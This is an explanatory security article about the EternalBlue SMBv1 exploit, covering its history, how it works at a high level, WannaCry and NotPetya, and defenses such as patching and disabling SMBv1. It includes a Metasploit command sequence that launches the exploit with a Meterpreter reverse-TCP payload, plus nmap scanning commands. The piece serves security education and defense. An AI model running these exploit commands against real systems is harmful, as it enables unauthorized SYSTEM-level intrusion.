EternalBlue is one of the most consequential exploits in cybersecurity history. Developed by the NSA, leaked by the Shadow Brokers in April 2017, and weaponized in the WannaCry and NotPetya attacks just weeks later, it compromised hundreds of thousands of systems worldwide and caused billions of dollars in damage. Understanding how it works is essential for every security professional — both to recognize its danger and to defend against it.
What is EternalBlue?
EternalBlue (CVE-2017-0144) is a remote code execution vulnerability in Microsoft’s implementation of the Server Message Block (SMB) protocol, specifically SMBv1. It affects the way Windows handles certain transaction request structures, allowing an unauthenticated attacker on the network to execute arbitrary code with SYSTEM privileges on an unpatched Windows machine.
The vulnerability exists in the srv.sys driver and is triggered by a malformed SMB_COM_TRANSACTION2 request that causes a buffer overflow in kernel memory.
Affected systems:
- Windows XP
- Windows Vista
- Windows 7
- Windows Server 2003
- Windows Server 2008 / 2008 R2
- Windows 8.1 (partial)
- Windows Server 2012
Microsoft patched it in MS17-010 on March 14, 2017 — but millions of systems remained unpatched when WannaCry hit on May 12, 2017.
How EternalBlue Works
At a high level, EternalBlue exploits a type confusion and integer overflow bug in SMBv1’s handling of Transaction2 sub-commands.
Step 1: Negotiation
The exploit begins with a standard SMB negotiation. The attacker’s client connects to port 445 on the target and negotiates the SMB dialect, specifically requesting SMBv1 (or an older dialect that the server accepts).
Step 2: Session Setup
An anonymous IPC$ connection is established. No credentials are needed — the exploit abuses the IPC$ share which Windows systems make available to unauthenticated users.
Step 3: Transaction2 Requests
EternalBlue sends a series of specially crafted SMB_COM_TRANSACTION2 packets. The first set of “setup” transactions manipulates heap memory on the target to create conditions favorable for the overflow. The Windows kernel SMB driver allocates fixed-size buffers for transaction data; EternalBlue confuses the driver about the size of a secondary transaction request, triggering a pool buffer overflow.
Step 4: Memory Corruption and Control
The overflow overwrites a kernel pool buffer. Through careful manipulation of the heap spray and pool grooming (manipulating which kernel memory blocks are free and adjacent), the exploit places a shellcode payload in a predictable memory location and overwrites a function pointer to redirect execution to it.
Step 5: SYSTEM Shell
The shellcode executes with SYSTEM privileges — the highest privilege level on Windows. From here, an attacker can install a backdoor, dump credentials, pivot to other systems, or deploy ransomware.
EternalBlue is implemented in Metasploit as exploit/windows/smb/ms17_010_eternalblue. It is used exclusively in authorized penetration testing and CTF environments:
msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.50
msf6 exploit(ms17_010_eternalblue) > set LPORT 4444
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > run
A successful exploitation returns a Meterpreter session with SYSTEM privileges.
Checking Vulnerability Before Exploitation
Always verify the target is vulnerable before attempting exploitation:
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(smb_ms17_010) > run
With Nmap:
nmap -p 445 --script smb-vuln-ms17-010 192.168.1.0/24
Output indicating vulnerability:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0144
Real-World Impact: WannaCry and NotPetya
WannaCry (May 2017)
WannaCry used EternalBlue as its propagation mechanism. Once inside a network, it spread autonomously to every unpatched Windows machine reachable on port 445 — no user interaction required. It infected over 200,000 systems in 150 countries within 24 hours. The NHS in the UK was particularly devastated, with hospitals unable to access patient records and surgeries cancelled.
WannaCry also incorporated DoublePulsar, a backdoor implant also from the NSA leak, to load its ransomware payload into memory.
NotPetya (June 2017)
NotPetya was even more destructive. Disguised as ransomware, it was actually a wiper — designed to destroy data permanently. It used EternalBlue plus credential harvesting via Mimikatz to spread laterally across networks. Companies like Maersk, Merck, and FedEx suffered combined losses exceeding $10 billion.
Why EternalBlue Still Matters in 2026
Nearly a decade after its disclosure, EternalBlue remains relevant:
- Legacy systems — hospitals, industrial control systems, and older enterprise environments still run Windows 7 and Server 2008
- Isolated networks — IT/OT environments that are “air-gapped” but still interconnected with corporate networks
- Patch lag — organizations with slow patch cycles remain exposed months after new patches release
- Ransomware — modern ransomware gangs still incorporate EternalBlue into their toolkits for lateral movement even against patched systems (using other exploits to gain initial access, then EternalBlue for spreading internally)
Defending Against EternalBlue
1. Apply MS17-010
This is non-negotiable. Microsoft’s March 2017 patch eliminates the vulnerability. For organizations still running Windows XP and Server 2003 (out of support), Microsoft released an emergency patch (KB4012212, KB4012213) given WannaCry’s severity.
# Check patch status on Windows
Get-HotFix -Id KB4012212,KB4012213,KB4012215,KB4012216
2. Disable SMBv1
SMBv1 should not exist on any modern network. Disable it:
# Disable SMBv1 server
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
# Disable SMBv1 client
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" `
-Name SMB1 -Type DWORD -Value 0 -Force
Verify:
Get-SmbServerConfiguration | Select-Object EnableSMB1Protocol
3. Block Port 445 at the Network Perimeter
SMB should never be exposed to the internet. Block port 445 inbound and outbound at your firewall. Internally, segment networks to prevent SMB traffic from crossing into sensitive zones.
4. Network Segmentation
EternalBlue spreads horizontally. Flat networks amplify its impact dramatically. Implement VLANs and micro-segmentation to limit SMB reachability between workstations.
5. Endpoint Detection and Response (EDR)
Modern EDR solutions detect EternalBlue exploitation patterns — pool grooming behavior, kernel shellcode execution, and DoublePulsar’s ring 0 backdoor — and block them in real time.
6. Regular Vulnerability Scanning
Scan your network for MS17-010 exposure regularly:
nmap -p 445 --script smb-vuln-ms17-010 <network_range> -oN eternalblue_scan.txt
Key Takeaways
| Aspect | Detail |
|---|
| CVE | CVE-2017-0144 |
| Affected protocol | SMBv1 on port 445 |
| Authentication required | None |
| Privileges gained | SYSTEM |
| Patch | MS17-010 (March 14, 2017) |
| Primary defense | Patch + disable SMBv1 + block port 445 |
Summary
EternalBlue represents the catastrophic intersection of nation-state offensive capability, software monoculture, and patch management failure. Its technical elegance — unauthenticated, wormable, kernel-level code execution — makes it a landmark in exploitation history. Understanding how it works helps security teams prioritize patching, network segmentation, and SMBv1 elimination. In 2026, any organization with unpatched Windows systems accepting SMBv1 on port 445 remains directly vulnerable to an exploit that is nine years old, fully public, and trivially weaponized.